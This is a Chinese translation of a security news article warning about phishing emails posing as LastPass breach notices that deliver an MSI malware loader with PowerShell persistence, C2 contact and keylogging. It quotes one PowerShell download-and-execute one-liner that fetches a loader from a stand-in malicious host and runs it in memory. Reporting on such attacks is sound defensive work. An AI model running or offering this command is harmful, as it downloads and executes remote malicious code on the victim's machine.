警惕假冒“LastPass被黑”的钓鱼邮件,其试图诱导用户安装恶意软件

阅读量14044

发布时间 : 2025-10-17 16:56:23

x
译文声明

本文是翻译文章,文章原作者 Tushar Subhra Dutta,文章来源:cybersecuritynews

原文地址:https://cybersecuritynews.com/beware-of-fake-lastpass-hack-emails/

译文仅供参考,具体内容表达以及含义原文为准。

安全专家对新一轮伪装成LastPass漏洞通知的钓鱼邮件发出警告。

这些邮件警告收件人“账户已紧急被盗”,并催促其下载“安全补丁”以恢复访问权限。

实际上,下载文件中包含一个复杂的恶意软件加载器,旨在窃取凭证并部署额外载荷。

该骗局自10月初开始活跃,已诱骗多名企业用户中招。

钓鱼邮件使用逼真的LastPass品牌元素,包括公司徽标和看似指向合法域名的链接。

然而,仔细检查会发现URL被微妙篡改,最终将用户重定向至攻击者控制的服务器,下载恶意可执行文件。

LastPass分析师在观察到多名用户报告“点击链接后出现意外登录失败和异常网络流量”后,识别了此攻击活动。

每封钓鱼邮件都附加名为“LastPass_Security_Update.zip ”的ZIP压缩包,内含伪装成MSI安装程序的可执行文件。

启动后,MSI会在用户的AppData文件夹中释放PowerShell脚本,并通过计划任务执行

该脚本连接远程命令与控制(C2)服务器,下载第二阶段载荷,具备键盘记录、截图捕获和企业网络内横向移动能力

感染机制:内存中执行与持久化注入

攻击核心是一段特制PowerShell命令,无需将脚本写入磁盘即可下载并执行加载器。以下是混淆命令的片段:

IEX(New-Object Net.WebClient).DownloadString('http://malicious.example.com/loader.ps1')

这行代码使用IEX(Invoke-Expression)直接在内存中执行下载内容,规避大多数防病毒解决方案

加载器随后将DLL注入svchost.exe 进程,以维持持久化并绕过应用程序白名单。

此事件强调了验证邮件真实性、启用多因素认证以及监控企业环境中异常PowerShell活动的重要性。

本文翻译自cybersecuritynews 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
安全客
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66